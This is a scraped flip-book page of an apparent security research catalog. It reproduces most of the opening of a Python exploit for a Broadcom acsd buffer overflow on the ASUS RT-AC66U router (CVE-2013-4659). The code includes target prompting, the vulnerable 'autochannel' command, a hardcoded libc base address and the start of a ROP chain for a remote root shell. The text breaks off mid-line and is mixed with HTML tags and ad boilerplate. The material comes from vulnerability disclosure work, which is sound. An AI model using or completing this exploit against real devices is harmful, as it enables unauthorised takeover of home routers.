ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
# The ASUS RT-‐AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple <br />
# Buffer Overflow attacks. <br />
# <br />
# Multiple overflows exist in the following software: <br />
# <br />
# -‐ Broadcom acsd -‐ Wirless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands) <br />
# <br />
def sigHandle(signum, frm): # Signal handler <br />
print "\n[!!!] Cleaning up the exploit... [!!!]\n" <br />
sleep(1) <br />
exit(0) <br />
def targServer(): <br />
while True: <br />
try: <br />
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-‐AC66U router:\n\n>")) <br />
server = inet_ntoa(server) <br />
break <br />
except: <br />
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" <br />
sleep(1) <br />
continue <br />
return server <br />
def main(): <br />
print ("""\n [*] Title: ASUS RT-‐AC66U Remote Root Shell Exploit -‐ acsd param command <br />
[*] Discovered and Reported: June 2013 <br />
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, <strong>Security</strong> Analysts @ <strong>ISE</strong> <br />
[*] Software Vendor: http://asus.com <br />
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ <br />
[*] Software: acsd wireless service (Listens on TCP/5916) <br />
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) <br />
[*] CVE: ASUS RT-‐AC66U Broadcom ACSD Buffer Overflow: CVE-‐2013-‐4659\n""") <br />
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c <br />
victim = targServer() <br />
port = int(5916) <br />
acsdCmd = "autochannel¶m=" #Vulnerable command -‐ JH <br />
# base address of .text section of libc.so.0 in acsd's address space <br />
libc_base = 0x2ab25000 <br />
# ROP gadget #1 <br />
# lui s0,0x2 <br />
# li a0,1 <br />
# move t9,s1 <br />
# jalr t9 <br />
# ori a1,s0,0x2 <br />
ra1 = struct.pack("